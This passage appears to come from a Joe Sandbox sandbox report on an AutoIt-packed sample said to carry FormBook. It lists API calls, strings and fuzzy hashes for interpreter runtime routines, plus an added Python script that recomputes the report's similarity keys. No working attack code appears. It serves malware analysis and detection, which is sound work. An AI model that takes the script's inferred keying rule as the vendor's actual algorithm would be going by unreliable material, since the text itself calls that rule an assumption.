                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00962A97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                    • Instruction ID: 1ecb5c8e5d7fa4fdfb82a6d167e185347ea7558916943651a2e3247c88b34db4
                                                                    • Opcode Fuzzy Hash: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                    • Instruction Fuzzy Hash: 6FB16DB2A10615AFEB14DF68DD89FAE7BB9FB49710F108118F915E7290D770AD40CBA0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00954AED
                                                                    • GetDriveTypeW.KERNEL32(?,0097CB68,?,\\.\,0097CC08), ref: 00954BCA
                                                                    • SetErrorMode.KERNEL32(00000000,0097CB68,?,\\.\,0097CC08), ref: 00954D36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: a66f8f71c99c7c4cc5966d996fb8172fdd938eb7de73cde6aab4ab427391b6ad
                                                                    • Instruction ID: 204e3f8e6ef38387dbed9f088b8bf57ba302712d44fe1c084d5ae10e089c6d83
                                                                    • Opcode Fuzzy Hash: a66f8f71c99c7c4cc5966d996fb8172fdd938eb7de73cde6aab4ab427391b6ad
                                                                    • Instruction Fuzzy Hash: 1A61D530605205ABCB54DF2AC981DAC77B4EBC634EB288415FC46EB291DB35EDC9DB81
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00977421
                                                                    • SetTextColor.GDI32(?,?), ref: 00977425
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                    • GetSysColor.USER32(0000000F), ref: 00977446
                                                                    • CreateSolidBrush.GDI32(?), ref: 0097744B
                                                                    • GetSysColor.USER32(00000011), ref: 00977463
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                    • SelectObject.GDI32(?,00000000), ref: 00977482
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                    • SelectObject.GDI32(?,?), ref: 00977498
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097752A
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00977554
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00977572
                                                                    • DrawFocusRect.USER32(?,?), ref: 0097757D
                                                                    • GetSysColor.USER32(00000011), ref: 0097758E
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00977596
                                                                    • DrawTextW.USER32(?,009770F5,000000FF,?,00000000), ref: 009775A8
                                                                    • SelectObject.GDI32(?,?), ref: 009775BF
                                                                    • DeleteObject.GDI32(?), ref: 009775CA
                                                                    • SelectObject.GDI32(?,?), ref: 009775D0
                                                                    • DeleteObject.GDI32(?), ref: 009775D5
                                                                    • SetTextColor.GDI32(?,?), ref: 009775DB
                                                                    • SetBkColor.GDI32(?,?), ref: 009775E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: 6c0f51e76015847eaf744776c4f09aa41b6b6747d0990a422256b066cd6c92e7
                                                                    • Instruction ID: 85ab2c2a4837e12d7e9ba3b448dd95d679a9328868464cd18542de8c308dcb5c
                                                                    • Opcode Fuzzy Hash: 6c0f51e76015847eaf744776c4f09aa41b6b6747d0990a422256b066cd6c92e7
                                                                    • Instruction Fuzzy Hash: 3B6153B3908218AFDF019FA4DC49AAEBF79EF08320F114525F919A72A1D7759980DF90
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00971128
                                                                    • GetDesktopWindow.USER32 ref: 0097113D
                                                                    • GetWindowRect.USER32(00000000), ref: 00971144
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00971199
                                                                    • DestroyWindow.USER32(?), ref: 009711B9
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009711ED
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097120B
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097121D
                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00971232
                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00971245
                                                                    • IsWindowVisible.USER32(00000000), ref: 009712A1
                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009712BC
                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009712D0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 009712E8
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0097130E
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00971328
                                                                    • CopyRect.USER32(?,?), ref: 0097133F
                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 009713AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                    • Instruction ID: ab7c82010646c3e76c941db376efecdecccf7677c9ff78972cfd57d319dfe055
                                                                    • Opcode Fuzzy Hash: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                    • Instruction Fuzzy Hash: 93B18A72608341AFD714DF69C884B6ABBE4FF85350F00891DF99D9B2A1DB71E844CB92
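                                                                    The window class and caption strings in the String IDs of the entries above ("AutoIt v3", "AutoIt v3 GUI", "msctls_progress32", "tooltips_class32") are the ones the AutoIt v3 interpreter uses for its own GUI, progress and tooltip windows, so these routines describe the runtime that carries the compiled script rather than the FormBook payload that is later injected. The "API ID" printed under "Similarity" is the key that lets an analyst match such runtime routines across reports of different samples. The script below is an added example, not part of the report or of Joe Sandbox; it recomputes that key from a function's "APIs" listing. The tokenisation rule it implements (CamelCase split, a "Lib_" prefix such as ImageList_ kept whole, tokens of three characters or fewer dropped, groups ordered by descending count and joined with "$") is inferred from the entries on this page and is an assumption, checked against the GetDriveTypeW routine at 00954AED, the ImageList routine at 008F8E14 and the tooltip routine at 00971128. The numeric "API String ID" hash is not reproduced.

```python
"""Recompute the "API ID" similarity key printed under each function in this
report from that function's "APIs" listing, so routines can be matched across
reports (for example to recognise AutoIt runtime boilerplate again).

The rule below is inferred from the entries on this page and is an assumption,
not the Joe Sandbox IDA plugin's published algorithm:
  * split each API name on CamelCase boundaries; a "Lib_" prefix such as
    ImageList_ is kept as one token;
  * drop tokens of three characters or fewer (Get, Set, Sys, Pos, Ex, W, ...);
  * count tokens over every call, including "Part of subcall function" lines;
  * order groups by descending count, tokens alphabetically inside a group,
    concatenate each group and join the groups with "$".
The numeric "API String ID" is a hash that this script does not reproduce.
"""
import re
from collections import Counter, defaultdict

# One line of an "APIs" block: optional subcall prefix, then Name.MODULE(args).
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)"
)
CAMEL_RE = re.compile(r"[A-Z][a-z0-9]*")
MIN_TOKEN_LEN = 4

# Window class / caption strings from this report's String IDs that belong to
# the AutoIt v3 interpreter's own GUI, progress and tooltip windows.
AUTOIT_MARKERS = ("AutoIt v3", "AutoIt v3 GUI", "msctls_progress32", "tooltips_class32")

# Constructed sample input: the "APIs" listings of two functions copied from
# this report (the GetDriveTypeW routine at 00954AED and the ImageList routine
# at 008F8E14), with the report's own API IDs as the expected keys.
DRIVE_TYPE_LISTING = r"""
• SetErrorMode.KERNEL32(00000001), ref: 00954AED
• GetDriveTypeW.KERNEL32(?,0097CB68,?,\\.\,0097CC08), ref: 00954BCA
• SetErrorMode.KERNEL32(00000000,0097CB68,?,\\.\,0097CC08), ref: 00954D36
"""
DRIVE_TYPE_EXPECTED = "ErrorMode$DriveType"

IMAGELIST_LISTING = """
• DestroyWindow.USER32(?,?), ref: 008F8E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00936AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00936AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00936F43
  • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
• SendMessageW.USER32(?,00001053), ref: 00936F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00936F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FB7
"""
IMAGELIST_EXPECTED = "DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove"


def parse_calls(listing):
    """Return (api, module) pairs from an 'APIs' block, in listing order."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.search(line)
        if m:
            calls.append((m.group("api"), m.group("module")))
    return calls


def tokenize(api):
    """Split one API name into the tokens the similarity key is built from."""
    if "_" in api:
        prefix, rest = api.split("_", 1)
        tokens = [prefix + "_"] + CAMEL_RE.findall(rest)
    else:
        tokens = CAMEL_RE.findall(api)
    return [t for t in tokens if len(t) >= MIN_TOKEN_LEN]


def api_id(listing):
    """Build the '$'-joined similarity key for one function's API listing."""
    counts = Counter(tok for api, _ in parse_calls(listing) for tok in tokenize(api))
    by_count = defaultdict(list)
    for tok, n in counts.items():
        by_count[n].append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def is_autoit_runtime(string_id):
    """True when a function's String ID carries an AutoIt interpreter marker."""
    return any(marker in string_id.split("$") for marker in AUTOIT_MARKERS)


if __name__ == "__main__":
    for name, listing, expected in (
        ("GetDriveTypeW routine", DRIVE_TYPE_LISTING, DRIVE_TYPE_EXPECTED),
        ("ImageList routine", IMAGELIST_LISTING, IMAGELIST_EXPECTED),
    ):
        key = api_id(listing)
        print(f"{name}: {key}  matches report: {key == expected}")
    print("AutoIt runtime marker:", is_autoit_runtime("AutoIt v3$DISPLAY$msctls_progress32$static"))
```

                                                                    Paste any function's "APIs" block into api_id() and compare the result with the report's own API ID line; a match confirms the key was derived from the same call set, so the key can be used to look the routine up in other reports without re-reading the listing. A String ID that is_autoit_runtime() flags is a reason to treat that function as interpreter code and move on to the injected process when looking for the payload's behaviour.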
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F8968
                                                                    • GetSystemMetrics.USER32(00000007), ref: 008F8970
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F899B
                                                                    • GetSystemMetrics.USER32(00000008), ref: 008F89A3
                                                                    • GetSystemMetrics.USER32(00000004), ref: 008F89C8
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F89E5
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F89F5
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F8A28
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F8A3C
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 008F8A5A
                                                                    • GetStockObject.GDI32(00000011), ref: 008F8A76
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008F8A81
                                                                      • Part of subcall function 008F912D: GetCursorPos.USER32(?), ref: 008F9141
                                                                      • Part of subcall function 008F912D: ScreenToClient.USER32(00000000,?), ref: 008F915E
                                                                      • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000001), ref: 008F9183
                                                                      • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000002), ref: 008F919D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,008F90FC), ref: 008F8AA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: f3a4d3e20d65a3b0dd649a1dd08acc72ea6d9200171b2a1985f3e50df35f9ae9
                                                                    • Instruction ID: e26433267ee8348d56717da6e329af477b32a26ab8367d929a9f56f5fac0102e
                                                                    • Opcode Fuzzy Hash: f3a4d3e20d65a3b0dd649a1dd08acc72ea6d9200171b2a1985f3e50df35f9ae9
                                                                    • Instruction Fuzzy Hash: 6BB19D72A14209EFDB14DFA8DD95BAE3BB5FB48314F104229FA15E7290DB70A940CF51
                                                                    APIs
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                      • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                      • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                      • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940DF5
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940E29
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940E40
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00940E7A
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940E96
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940EAD
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940EB5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00940EBC
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940EDD
                                                                    • CopySid.ADVAPI32(00000000), ref: 00940EE4
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940F13
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940F35
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940F47
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F6E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F75
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F7E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F85
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F8E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F95
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00940FA1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940FA8
                                                                      • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                      • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                      • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                    • Instruction ID: 020daf13fa3b4524148803b93d1cf63770c0ddc7a950a9c88c1348a881d17bde
                                                                    • Opcode Fuzzy Hash: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                    • Instruction Fuzzy Hash: 52716FB290420AABDF209FA4DC44FAEBBBCBF84300F044169FA19A7191D7359945CBA0
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096C4BD
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097CC08,00000000,?,00000000,?,?), ref: 0096C544
                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0096C5A4
                                                                    • _wcslen.LIBCMT ref: 0096C5F4
                                                                    • _wcslen.LIBCMT ref: 0096C66F
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0096C6B2
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0096C7C1
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0096C84D
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096C881
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096C88E
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0096C960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 9721498-966354055
                                                                    • Opcode ID: 21a3ef353800a50651ed5fea2a95099884c7a7217b96c02a5f626b4dd8c9f665
                                                                    • Instruction ID: c39bf6e6942ec007eb2f07c387782331859bca75327207e1c18b2389c0fd3979
                                                                    • Opcode Fuzzy Hash: 21a3ef353800a50651ed5fea2a95099884c7a7217b96c02a5f626b4dd8c9f665
                                                                    • Instruction Fuzzy Hash: 921269756082019FDB14DF19C881A2AB7E5FF89714F04885CF99A9B3A2DB31FD41CB82
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 009709C6
                                                                    • _wcslen.LIBCMT ref: 00970A01
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00970A54
                                                                    • _wcslen.LIBCMT ref: 00970A8A
                                                                    • _wcslen.LIBCMT ref: 00970B06
                                                                    • _wcslen.LIBCMT ref: 00970B81
                                                                      • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                      • Part of subcall function 00942BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00942BFA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 1103490817-4258414348
                                                                    • Opcode ID: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                    • Instruction ID: bb237c1122d6120cc16094bf79e7dfe023abfa73be446c902dae69fe19dec7e1
                                                                    • Opcode Fuzzy Hash: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                    • Instruction Fuzzy Hash: A9E16632208341CFCB24DF29C45192AB7E5FFD9714F148958F89A9B2A2D730EE45CB82
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 1256254125-909552448
                                                                    • Opcode ID: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                    • Instruction ID: 8c4459560493e6310f950bd8dbcae5e27c133d2ef2dd6cd236751bcfa094dc9b
                                                                    • Opcode Fuzzy Hash: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                    • Instruction Fuzzy Hash: B57117B260016A8BCB20DEBCCD516BF3399AFA1754F150528FCE6DB284E635CD40D3A1
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0097835A
                                                                    • _wcslen.LIBCMT ref: 0097836E
                                                                    • _wcslen.LIBCMT ref: 00978391
                                                                    • _wcslen.LIBCMT ref: 009783B4
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009783F2
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0097361A,?), ref: 0097844E
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978487
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009784CA
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978501
                                                                    • FreeLibrary.KERNEL32(?), ref: 0097850D
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097851D
                                                                    • DestroyIcon.USER32(?), ref: 0097852C
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00978549
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00978555
                                                                    Strings
                                                                    Memory Dump Source
